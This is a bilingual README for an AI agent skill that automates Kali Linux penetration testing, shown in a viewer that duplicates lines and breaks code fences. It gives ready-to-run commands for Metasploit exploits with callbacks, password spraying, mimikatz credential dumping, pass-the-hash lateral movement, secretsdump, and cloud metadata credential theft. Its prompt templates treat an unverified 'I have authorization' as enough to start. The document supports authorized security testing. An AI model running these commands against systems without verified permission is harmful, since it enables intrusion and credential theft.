Back to Details

kali-pentest-ai-agent

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

kali-pentest-ai-agent

kali-pentest-ai-agent

Skill by ara.so — Security Skills collection.
An AI agent skill for autonomous penetration testing using Kali Linux. Provides 269 CLI security tools across 14 categories, 15+ scenario playbooks, intelligent attack path planning, cross-phase result integration, and mandatory human approval for high-risk actions. Unlike traditional automated scanners, this skill enables AI agents to adaptively plan, execute, and iterate through penetration testing phases like a human security researcher.
ara.so开发的技能——安全技能合集。
这是一款基于Kali Linux的AI Agent自动化渗透测试技能。它提供了涵盖14个类别的269款CLI安全工具、15+个场景剧本、智能攻击路径规划、跨阶段结果整合功能,并要求高风险操作必须经过人工审批。与传统自动化扫描器不同,该技能能让AI Agent像人类安全研究员一样,自适应地规划、执行并迭代渗透测试的各个阶段。

What It Does

功能介绍

  • Autonomous Attack Planning: AI agent analyzes targets and plans multi-phase attack paths
  • Tool Selection & Execution: Intelligently selects from 269+ Kali tools based on context
  • Cross-Phase Integration: Integrates findings across reconnaissance, scanning, exploitation, and post-exploitation
  • Adaptive Strategy: Adjusts testing approach based on intermediate results
  • Human Approval Gates: Requires explicit authorization before high-risk actions
  • Depth Control: Supports Quick/Standard/Deep testing modes with coverage matrices
  • Structured Reporting: Generates Markdown and HTML reports with evidence and remediation
  • 自主攻击规划:AI Agent分析目标并规划多阶段攻击路径
  • 工具选择与执行:根据上下文智能选择269+款Kali工具
  • 跨阶段整合:整合侦察、扫描、利用和后渗透阶段的发现结果
  • 自适应策略:根据中间结果调整测试方法
  • 人工审批环节:高风险操作前需要明确授权
  • 深度控制:支持快速/标准/深度测试模式及覆盖矩阵
  • 结构化报告:生成包含证据和修复建议的Markdown与HTML报告

Installation

安装步骤

1. Install the Skill

1. 安装技能

Copy the skill directory into your AI agent's skills folder:
bash
undefined
将技能目录复制到AI Agent的技能文件夹中:
bash
undefined

For Claude Code (personal)

For Claude Code (personal)

cp -r kali-pentest ~/.claude/skills/
cp -r kali-pentest ~/.claude/skills/

For Claude Code (project-specific)

For Claude Code (project-specific)

cp -r kali-pentest .claude/skills/
cp -r kali-pentest .claude/skills/

For OpenClaw

For OpenClaw

cp -r kali-pentest ~/.openclaw/skills/
cp -r kali-pentest ~/.openclaw/skills/

For Hermes Agent

For Hermes Agent

cp -r kali-pentest ~/.hermes/skills/
undefined
cp -r kali-pentest ~/.hermes/skills/
undefined

2. Set Up Kali Environment

2. 搭建Kali环境

Choose one of three modes:
Local Mode (agent runs directly on Kali):
bash
undefined
选择以下三种模式之一:
本地模式(Agent直接在Kali上运行):
bash
undefined

Ensure you're on Kali Linux

Ensure you're on Kali Linux

cat /etc/os-release | grep Kali
cat /etc/os-release | grep Kali

Verify tool availability

Verify tool availability

which nmap metasploit-framework burpsuite

**Server Mode** (SSH to remote Kali):
```bash
which nmap metasploit-framework burpsuite

**服务器模式**(通过SSH连接远程Kali):
```bash

Generate SSH key if needed

Generate SSH key if needed

ssh-keygen -t ed25519 -f ~/.ssh/kali_key
ssh-keygen -t ed25519 -f ~/.ssh/kali_key

Copy public key to Kali server

Copy public key to Kali server

ssh-copy-id -i ~/.ssh/kali_key.pub root@kali-server-ip
ssh-copy-id -i ~/.ssh/kali_key.pub root@kali-server-ip

Test connection

Test connection

ssh -i ~/.ssh/kali_key root@kali-server-ip "uname -a"

**Docker Mode** (containerized Kali):
```bash
ssh -i ~/.ssh/kali_key root@kali-server-ip "uname -a"

**Docker模式**(容器化Kali):
```bash

Pull Kali Docker image

Pull Kali Docker image

docker pull kalilinux/kali-rolling
docker pull kalilinux/kali-rolling

Create persistent container

Create persistent container

docker run -d --name kali-pentest
--network host
--cap-add=NET_ADMIN
--cap-add=NET_RAW
-v $(pwd)/kali-pentest:/workspace
kalilinux/kali-rolling tail -f /dev/null
docker run -d --name kali-pentest
--network host
--cap-add=NET_ADMIN
--cap-add=NET_RAW
-v $(pwd)/kali-pentest:/workspace
kalilinux/kali-rolling tail -f /dev/null

Install base tools

Install base tools

docker exec kali-pentest bash -c "apt update && apt install -y kali-linux-default"
undefined
docker exec kali-pentest bash -c "apt update && apt install -y kali-linux-default"
undefined

3. Configure Environment Variables

3. 配置环境变量

bash
undefined
bash
undefined

Set Kali connection mode

Set Kali connection mode

export KALI_MODE="local" # or "server" or "docker"
export KALI_MODE="local" # or "server" or "docker"

For server mode

For server mode

export KALI_SSH_KEY="$HOME/.ssh/kali_key" export KALI_HOST="root@192.168.1.100"
export KALI_SSH_KEY="$HOME/.ssh/kali_key" export KALI_HOST="root@192.168.1.100"

For docker mode

For docker mode

export KALI_CONTAINER="kali-pentest"
export KALI_CONTAINER="kali-pentest"

Output directory for reports

Output directory for reports

export PENTEST_OUTPUT_DIR="$HOME/pentest-reports" mkdir -p "$PENTEST_OUTPUT_DIR"
undefined
export PENTEST_OUTPUT_DIR="$HOME/pentest-reports" mkdir -p "$PENTEST_OUTPUT_DIR"
undefined

Key Commands & Usage

核心命令与使用方法

Invoke via Slash Command

通过斜杠命令调用

bash
undefined
bash
undefined

In Claude Code or compatible agent

In Claude Code or compatible agent

/kali-pentest
undefined
/kali-pentest
undefined

Invoke via Natural Language

通过自然语言调用

Quick Scan Example:
Kali tools are available locally (this machine is Kali).
Target: 10.0.0.0/24
Quickly scan the target network for open ports and services.
I have authorization.
Standard Assessment Example:
The persistent Docker container `kali-pentest` is initialized.
Use Docker mode to run a web application penetration test against http://192.168.1.50.
I have authorization.
Deep Assessment Example:
Kali server: ssh -i ~/.ssh/kali_key root@192.168.1.100
First run a full port scan against 192.168.1.50, then plan and execute 
an in-depth penetration test — do not overlook any potential weakness.
I have authorization.
快速扫描示例:
Kali tools are available locally (this machine is Kali).
Target: 10.0.0.0/24
Quickly scan the target network for open ports and services.
I have authorization.
标准评估示例:
The persistent Docker container `kali-pentest` is initialized.
Use Docker mode to run a web application penetration test against http://192.168.1.50.
I have authorization.
深度评估示例:
Kali server: ssh -i ~/.ssh/kali_key root@192.168.1.100
First run a full port scan against 192.168.1.50, then plan and execute 
an in-depth penetration test — do not overlook any potential weakness.
I have authorization.

Core Workflow

核心工作流

The agent executes five steps:
Agent执行以下五个步骤:

Step 1: Environment Setup

步骤1:环境搭建

bash
undefined
bash
undefined

Agent verifies Kali access

Agent verifies Kali access

ssh -i ~/.ssh/kali_key root@kali-host "which nmap metasploit sqlmap"
ssh -i ~/.ssh/kali_key root@kali-host "which nmap metasploit sqlmap"

Or local mode

Or local mode

which nmap metasploit sqlmap
which nmap metasploit sqlmap

Or docker mode

Or docker mode

docker exec kali-pentest which nmap metasploit sqlmap
undefined
docker exec kali-pentest which nmap metasploit sqlmap
undefined

Step 2: Planning

步骤2:规划阶段

bash
undefined
bash
undefined

Agent confirms authorization and scope

Agent confirms authorization and scope

Selects appropriate playbook from decision tree:

Selects appropriate playbook from decision tree:

- external-network.md

- external-network.md

- internal-network.md

- internal-network.md

- web-application.md

- web-application.md

- active-directory.md

- active-directory.md

- api-security.md

- api-security.md

- cloud-native.md

- cloud-native.md

- mobile-application.md

- mobile-application.md

- wireless-network.md

- wireless-network.md

- password-audit.md

- password-audit.md

- source-code-audit.md

- source-code-audit.md

- social-engineering.md

- social-engineering.md

- physical-security.md

- physical-security.md

- voip-ics.md

- voip-ics.md

- post-exploitation.md

- post-exploitation.md

- reporting.md

- reporting.md

undefined
undefined

Step 3: Execute Phases

步骤3:执行各阶段

Reconnaissance:
bash
undefined
侦察阶段:
bash
undefined

Host discovery

Host discovery

nmap -sn 192.168.1.0/24 -oN hosts.txt
nmap -sn 192.168.1.0/24 -oN hosts.txt

DNS enumeration

DNS enumeration

dig @8.8.8.8 example.com ANY +noall +answer dnsenum --enum example.com
dig @8.8.8.8 example.com ANY +noall +answer dnsenum --enum example.com

Subdomain discovery

Subdomain discovery

subfinder -d example.com -o subdomains.txt

**Port Scanning**:
```bash
subfinder -d example.com -o subdomains.txt

**端口扫描**:
```bash

Quick scan

Quick scan

nmap -T4 -F 192.168.1.50
nmap -T4 -F 192.168.1.50

Full TCP scan with service detection

Full TCP scan with service detection

nmap -p- -sV -sC -O 192.168.1.50 -oA full-scan
nmap -p- -sV -sC -O 192.168.1.50 -oA full-scan

UDP scan for common services

UDP scan for common services

nmap -sU --top-ports 100 192.168.1.50 -oN udp-scan.txt

**Vulnerability Detection**:
```bash
nmap -sU --top-ports 100 192.168.1.50 -oN udp-scan.txt

**漏洞检测**:
```bash

Nmap vulnerability scripts

Nmap vulnerability scripts

nmap --script vuln 192.168.1.50 -oN vuln-scan.txt
nmap --script vuln 192.168.1.50 -oN vuln-scan.txt

Web vulnerability scanning

Web vulnerability scanning

nikto -h http://192.168.1.50 -output nikto.txt
nikto -h http://192.168.1.50 -output nikto.txt

SSL/TLS testing

SSL/TLS testing

sslscan --no-failed 192.168.1.50:443

**Exploitation**:
```bash
sslscan --no-failed 192.168.1.50:443

**漏洞利用**:
```bash

Metasploit Framework

Metasploit Framework

msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl;
set RHOST 192.168.1.50; set LHOST 192.168.1.10; exploit"
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl;
set RHOST 192.168.1.50; set LHOST 192.168.1.10; exploit"

SQL injection

SQL injection

sqlmap -u "http://192.168.1.50/page?id=1" --dbs --batch
sqlmap -u "http://192.168.1.50/page?id=1" --dbs --batch

Password spraying

Password spraying

crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

**Post-Exploitation**:
```bash
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

**后渗透阶段**:
```bash

Privilege escalation enumeration

Privilege escalation enumeration

linpeas.sh | tee linpeas-output.txt
linpeas.sh | tee linpeas-output.txt

Credential dumping

Credential dumping

mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Lateral movement

Lateral movement

crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
undefined
crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
undefined

Step 4: Analyze & Iterate

步骤4:分析与迭代

Agent integrates results across phases:
python
undefined
Agent整合各阶段结果:
python
undefined

Example: Agent logic (pseudocode)

Example: Agent logic (pseudocode)

if redis_noauth_found: exploit_redis_for_shell() if shell_obtained: run_privilege_escalation_enum() if credentials_found: attempt_lateral_movement()
undefined
if redis_noauth_found: exploit_redis_for_shell() if shell_obtained: run_privilege_escalation_enum() if credentials_found: attempt_lateral_movement()
undefined

Step 5: Report Generation

步骤5:报告生成

bash
undefined
bash
undefined

Generate Markdown report

Generate Markdown report

cat > report.md <<EOF
cat > report.md <<EOF

Penetration Test Report

Penetration Test Report

Executive Summary

Executive Summary

  • Target: 192.168.1.50
  • Date: $(date)
  • Severity: Critical findings detected
  • Target: 192.168.1.50
  • Date: $(date)
  • Severity: Critical findings detected

Findings

Findings

[CRITICAL] Unauthenticated Redis Access

[CRITICAL] Unauthenticated Redis Access

Evidence: ```redis-cli -h 192.168.1.50 INFO``` Impact: Remote code execution via Redis module injection Remediation: Enable authentication with `requirepass` directive
Evidence: ```redis-cli -h 192.168.1.50 INFO``` Impact: Remote code execution via Redis module injection Remediation: Enable authentication with `requirepass` directive

Attack Chain

Attack Chain

Redis no-auth → SSH shell → SUID privesc → root access EOF
Redis no-auth → SSH shell → SUID privesc → root access EOF

Convert to HTML (agent uses reporting tools)

Convert to HTML (agent uses reporting tools)

markdown report.md > report.html
undefined
markdown report.md > report.html
undefined

Common Patterns

常见测试模式

Pattern 1: Network Penetration Test

模式1:网络渗透测试

bash
undefined
bash
undefined

Phase 1: Discovery

Phase 1: Discovery

nmap -sn $TARGET_NETWORK -oG - | grep "Up" | cut -d' ' -f2 > live-hosts.txt
nmap -sn $TARGET_NETWORK -oG - | grep "Up" | cut -d' ' -f2 > live-hosts.txt

Phase 2: Port scanning

Phase 2: Port scanning

while read host; do nmap -p- -sV -sC "$host" -oN "scan-$host.txt" done < live-hosts.txt
while read host; do nmap -p- -sV -sC "$host" -oN "scan-$host.txt" done < live-hosts.txt

Phase 3: Vulnerability assessment

Phase 3: Vulnerability assessment

for host in $(cat live-hosts.txt); do nmap --script vuln "$host" -oN "vuln-$host.txt" done
for host in $(cat live-hosts.txt); do nmap --script vuln "$host" -oN "vuln-$host.txt" done

Phase 4: Exploitation (with approval)

Phase 4: Exploitation (with approval)

Agent pauses here for human confirmation

Agent pauses here for human confirmation

msfconsole -r exploit-script.rc
undefined
msfconsole -r exploit-script.rc
undefined

Pattern 2: Web Application Test

模式2:Web应用测试

bash
undefined
bash
undefined

Passive reconnaissance

Passive reconnaissance

whatweb http://$TARGET wafw00f http://$TARGET
whatweb http://$TARGET wafw00f http://$TARGET

Active scanning

Active scanning

nikto -h http://$TARGET -output nikto.html -Format html zap-cli quick-scan --self-contained http://$TARGET
nikto -h http://$TARGET -output nikto.html -Format html zap-cli quick-scan --self-contained http://$TARGET

Targeted exploitation

Targeted exploitation

sqlmap -u "http://$TARGET/page?id=1" --risk 3 --level 5 --batch wpscan --url http://$TARGET --enumerate vp,vt,u
undefined
sqlmap -u "http://$TARGET/page?id=1" --risk 3 --level 5 --batch wpscan --url http://$TARGET --enumerate vp,vt,u
undefined

Pattern 3: Active Directory Assessment

模式3:Active Directory评估

bash
undefined
bash
undefined

Initial enumeration

Initial enumeration

crackmapexec smb $DC_IP -u '' -p '' --shares ldapsearch -x -h $DC_IP -b "DC=corp,DC=example,DC=com"
crackmapexec smb $DC_IP -u '' -p '' --shares ldapsearch -x -h $DC_IP -b "DC=corp,DC=example,DC=com"

Kerberoasting

Kerberoasting

impacket-GetUserSPNs corp.example.com/user:password -dc-ip $DC_IP -request
impacket-GetUserSPNs corp.example.com/user:password -dc-ip $DC_IP -request

Bloodhound collection

Bloodhound collection

bloodhound-python -d corp.example.com -u user -p password -ns $DC_IP -c all
bloodhound-python -d corp.example.com -u user -p password -ns $DC_IP -c all

Post-exploitation

Post-exploitation

impacket-secretsdump corp.example.com/admin@$DC_IP
undefined
impacket-secretsdump corp.example.com/admin@$DC_IP
undefined

Pattern 4: Cloud-Native Security

模式4:云原生安全测试

bash
undefined
bash
undefined

Kubernetes enumeration

Kubernetes enumeration

kubectl get pods --all-namespaces kubectl get secrets --all-namespaces -o json | grep -i password
kubectl get pods --all-namespaces kubectl get secrets --all-namespaces -o json | grep -i password

Container escape detection

Container escape detection

amicontained
amicontained

Cloud metadata access

Cloud metadata access

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
undefined
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
undefined

Configuration

配置说明

Depth Settings

测试深度设置

Control testing thoroughness via natural language:
Trigger PhraseDepthCoverage
"quick scan", "fast check"QuickTop 100 ports, common vulnerabilities
(default)StandardFull TCP, service fingerprinting, OWASP Top 10
"comprehensive", "deep", "thorough"DeepAll ports, exhaustive vulnerability checks, manual verification
通过自然语言控制测试细致程度:
触发短语深度覆盖范围
"quick scan", "fast check"快速前100个端口、常见漏洞
(默认)标准全TCP端口、服务指纹识别、OWASP Top 10
"comprehensive", "deep", "thorough"深度所有端口、全面漏洞检查、人工验证

Approval Gates

审批环节

High-risk actions require explicit human confirmation:
  • Exploitation attempts (RCE, privilege escalation)
  • Credential dumping
  • Lateral movement
  • Service disruption (DoS tests)
  • Data exfiltration
Agent will pause and request approval:
🔴 HIGH-RISK ACTION REQUIRES APPROVAL:
Execute Metasploit exploit against 192.168.1.50 (RCE attempt)

Type 'APPROVE' to proceed or 'DENY' to skip:
高风险操作需要明确的人工确认:
  • 漏洞利用尝试(远程代码执行、权限提升)
  • 凭证提取
  • 横向移动
  • 服务中断(DoS测试)
  • 数据泄露
Agent会暂停并请求审批:
🔴 HIGH-RISK ACTION REQUIRES APPROVAL:
Execute Metasploit exploit against 192.168.1.50 (RCE attempt)

Type 'APPROVE' to proceed or 'DENY' to skip:

Troubleshooting

故障排除

Connection Issues

连接问题

bash
undefined
bash
undefined

Test SSH connection

Test SSH connection

ssh -i $KALI_SSH_KEY -v $KALI_HOST "echo 'Connection OK'"
ssh -i $KALI_SSH_KEY -v $KALI_HOST "echo 'Connection OK'"

Test Docker connection

Test Docker connection

docker exec $KALI_CONTAINER echo "Container OK"
docker exec $KALI_CONTAINER echo "Container OK"

Check network connectivity from Kali

Check network connectivity from Kali

ssh -i $KALI_SSH_KEY $KALI_HOST "ping -c 3 $TARGET_IP"
undefined
ssh -i $KALI_SSH_KEY $KALI_HOST "ping -c 3 $TARGET_IP"
undefined

Tool Not Found

工具未找到

bash
undefined
bash
undefined

Install missing tool (server mode)

Install missing tool (server mode)

ssh -i $KALI_SSH_KEY $KALI_HOST "apt update && apt install -y <tool-name>"
ssh -i $KALI_SSH_KEY $KALI_HOST "apt update && apt install -y <tool-name>"

Install in Docker

Install in Docker

docker exec $KALI_CONTAINER bash -c "apt update && apt install -y <tool-name>"
undefined
docker exec $KALI_CONTAINER bash -c "apt update && apt install -y <tool-name>"
undefined

Permission Errors

权限错误

bash
undefined
bash
undefined

Grant NET_ADMIN capability (Docker)

Grant NET_ADMIN capability (Docker)

docker run --cap-add=NET_ADMIN --cap-add=NET_RAW ...
docker run --cap-add=NET_ADMIN --cap-add=NET_RAW ...

Run as root (server mode)

Run as root (server mode)

ssh -i $KALI_SSH_KEY root@$KALI_HOST
ssh -i $KALI_SSH_KEY root@$KALI_HOST

Check sudo privileges

Check sudo privileges

ssh -i $KALI_SSH_KEY $KALI_HOST "sudo -l"
undefined
ssh -i $KALI_SSH_KEY $KALI_HOST "sudo -l"
undefined

Output Collection Failures

输出收集失败

bash
undefined
bash
undefined

Ensure output directory exists

Ensure output directory exists

mkdir -p $PENTEST_OUTPUT_DIR
mkdir -p $PENTEST_OUTPUT_DIR

Check disk space

Check disk space

df -h $PENTEST_OUTPUT_DIR
df -h $PENTEST_OUTPUT_DIR

Verify write permissions

Verify write permissions

touch $PENTEST_OUTPUT_DIR/test && rm $PENTEST_OUTPUT_DIR/test
undefined
touch $PENTEST_OUTPUT_DIR/test && rm $PENTEST_OUTPUT_DIR/test
undefined

Agent Stops Early

Agent提前终止

If coverage is insufficient:
The current pentest results are not comprehensive enough. 
Check the playbook's "Stop When" conditions and coverage matrix.
Have all required tool categories been utilized?
如果覆盖范围不足:
The current pentest results are not comprehensive enough. 
Check the playbook's "Stop When" conditions and coverage matrix.
Have all required tool categories been utilized?

Real-World Examples

实际案例

Example 1: External Network Pentest

案例1:外部网络渗透测试

bash
undefined
bash
undefined

Reconnaissance

Reconnaissance

amass enum -d target.com -o subdomains.txt nmap -iL subdomains.txt -p 80,443,8080,8443 -oA web-services
amass enum -d target.com -o subdomains.txt nmap -iL subdomains.txt -p 80,443,8080,8443 -oA web-services

Vulnerability scanning

Vulnerability scanning

nuclei -l web-services.txt -t cves/ -o nuclei-findings.txt
nuclei -l web-services.txt -t cves/ -o nuclei-findings.txt

Exploitation (approved)

Exploitation (approved)

msfconsole -x "use exploit/multi/http/apache_log4j_rce; set RHOST 10.0.0.50; exploit"
msfconsole -x "use exploit/multi/http/apache_log4j_rce; set RHOST 10.0.0.50; exploit"

Report

Report

cat nuclei-findings.txt web-services.nmap > final-report.md
undefined
cat nuclei-findings.txt web-services.nmap > final-report.md
undefined

Example 2: Internal Network Compromise

案例2:内部网络渗透

bash
undefined
bash
undefined

Initial foothold via phishing (simulated)

Initial foothold via phishing (simulated)

Now on internal network: 172.16.0.0/16

Now on internal network: 172.16.0.0/16

Host discovery

Host discovery

netdiscover -r 172.16.0.0/16 -P
netdiscover -r 172.16.0.0/16 -P

Lateral movement

Lateral movement

crackmapexec smb 172.16.0.0/16 -u admin -H $NTLM_HASH --sam
crackmapexec smb 172.16.0.0/16 -u admin -H $NTLM_HASH --sam

Domain enumeration

Domain enumeration

bloodhound-python -d corp.local -u admin -p $PASSWORD -c all -ns 172.16.0.10
bloodhound-python -d corp.local -u admin -p $PASSWORD -c all -ns 172.16.0.10

Domain admin compromise

Domain admin compromise

impacket-psexec corp.local/dadmin@172.16.0.10 -hashes :$DA_HASH
undefined
impacket-psexec corp.local/dadmin@172.16.0.10 -hashes :$DA_HASH
undefined

Example 3: API Security Assessment

案例3:API安全评估

bash
undefined
bash
undefined

Parse OpenAPI spec

Parse OpenAPI spec

cat openapi.yaml | grep -E "paths:|/api/"
cat openapi.yaml | grep -E "paths:|/api/"

Automated fuzzing

Automated fuzzing

ffuf -w /usr/share/wordlists/api-endpoints.txt
-u https://api.target.com/FUZZ
-H "Authorization: Bearer $API_TOKEN"
ffuf -w /usr/share/wordlists/api-endpoints.txt
-u https://api.target.com/FUZZ
-H "Authorization: Bearer $API_TOKEN"

Authentication bypass testing

Authentication bypass testing

sqlmap -u "https://api.target.com/user?id=1"
-H "Authorization: Bearer $API_TOKEN"
--batch --level 5
undefined
sqlmap -u "https://api.target.com/user?id=1"
-H "Authorization: Bearer $API_TOKEN"
--batch --level 5
undefined

Documentation References

文档参考

  • Official Kali Docs: https://www.kali.org/docs/
  • Playbooks: 
    kali-pentest/references/playbooks/
  • Tool Categories: 
    kali-pentest/references/<category>/
  • Environment Setup: 
    kali-pentest/references/environment/
  • Official Kali Docs: https://www.kali.org/docs/
  • Playbooks: 
    kali-pentest/references/playbooks/
  • Tool Categories: 
    kali-pentest/references/<category>/
  • Environment Setup: 
    kali-pentest/references/environment/

Tested Models

测试过的模型

Optimized for:
  • claude-opus-4.6
  • claude-sonnet-4.6
  • deepseek-v4-pro
  • qwen3.6:27b
    (local, requires ≥128K context)
优化适配以下模型:
  • claude-opus-4.6
  • claude-sonnet-4.6
  • deepseek-v4-pro
  • qwen3.6:27b
    (本地部署,需≥128K上下文)

Legal & Ethical Use

法律与伦理说明

⚠️ AUTHORIZATION REQUIRED: This skill is for authorized penetration testing only. Always obtain explicit written permission before testing any target. Unauthorized access to computer systems is illegal under CFAA (US), Computer Misuse Act (UK), and similar laws worldwide.
⚠️ 必须获得授权:本技能仅用于授权的渗透测试。测试任何目标前必须获得明确的书面许可。未经授权访问计算机系统违反美国《计算机欺诈和滥用法案》(CFAA)、英国《计算机滥用法案》及全球类似法律。